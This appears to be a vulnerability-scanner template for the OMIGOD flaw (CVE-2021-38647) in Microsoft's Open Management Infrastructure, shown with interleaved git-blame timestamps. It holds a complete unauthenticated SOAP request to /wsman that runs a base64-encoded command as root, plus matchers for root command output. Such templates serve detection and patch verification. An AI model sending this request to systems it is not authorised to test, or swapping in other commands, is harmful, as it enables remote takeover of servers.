2021-09-15 16:10:58 +00:00
|
|
|
id: CVE-2021-38647
|
|
|
|
|
|
|
|
info:
|
2021-09-15 16:30:09 +00:00
|
|
|
name: OMIGOD - Open Management Infrastructure RCE
|
2021-09-17 08:12:22 +00:00
|
|
|
author: daffainfo,xstp
|
2021-09-15 16:10:58 +00:00
|
|
|
severity: critical
|
2021-09-17 08:12:22 +00:00
|
|
|
tags: cve,cve2021,rce,omi,microsoft
|
|
|
|
description: Open Management Infrastructure Remote Code Execution Vulnerability
|
2021-09-15 16:10:58 +00:00
|
|
|
reference:
|
|
|
|
- https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
|
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
|
2021-09-15 16:30:09 +00:00
|
|
|
- https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647
|
2021-09-17 05:56:55 +00:00
|
|
|
- https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/
|
2021-09-15 16:30:09 +00:00
|
|
|
- https://github.com/microsoft/omi
|
2021-09-27 10:27:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.80
|
|
|
|
cve-id: CVE-2021-38647
|
2021-09-15 16:10:58 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wsman HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-09-17 08:12:22 +00:00
|
|
|
Content-Type: application/soap+xml;charset=UTF-8
|
2021-09-17 08:12:40 +00:00
|
|
|
|
2021-09-17 08:12:22 +00:00
|
|
|
<s:Envelope
|
|
|
|
xmlns:s="http://www.w3.org/2003/05/soap-envelope"
|
|
|
|
xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
|
|
|
|
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration"
|
|
|
|
xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
|
|
|
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema"
|
|
|
|
xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell"
|
|
|
|
xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
|
|
|
|
<s:Header>
|
2021-09-17 08:33:42 +00:00
|
|
|
<a:To>HTTP://{{Hostname}}/wsman/</a:To>
|
2021-09-17 08:12:22 +00:00
|
|
|
<w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
|
|
|
|
<a:ReplyTo>
|
|
|
|
<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
|
|
|
|
</a:ReplyTo>
|
|
|
|
<a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
|
|
|
|
<w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
|
|
|
|
<a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
|
|
|
|
<w:OperationTimeout>PT1M30S</w:OperationTimeout>
|
|
|
|
<w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
|
|
|
|
<p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
|
|
|
|
<w:OptionSet s:mustUnderstand="true"/>
|
|
|
|
<w:SelectorSet>
|
|
|
|
<w:Selector Name="__cimnamespace">root/scx</w:Selector>
|
|
|
|
</w:SelectorSet>
|
|
|
|
</s:Header>
|
|
|
|
<s:Body>
|
|
|
|
<p:ExecuteScript_INPUT
|
|
|
|
xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
|
|
|
|
<p:Script>aWQ=</p:Script>
|
|
|
|
<p:Arguments/>
|
|
|
|
<p:timeout>0</p:timeout>
|
|
|
|
<p:b64encoded>true</p:b64encoded>
|
|
|
|
</p:ExecuteScript_INPUT>
|
|
|
|
</s:Body>
|
2021-09-15 16:10:58 +00:00
|
|
|
</s:Envelope>
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-09-17 08:12:22 +00:00
|
|
|
- '<p:StdOut>'
|
|
|
|
- 'uid=0(root) gid=0(root) groups=0'
|
|
|
|
condition: and
|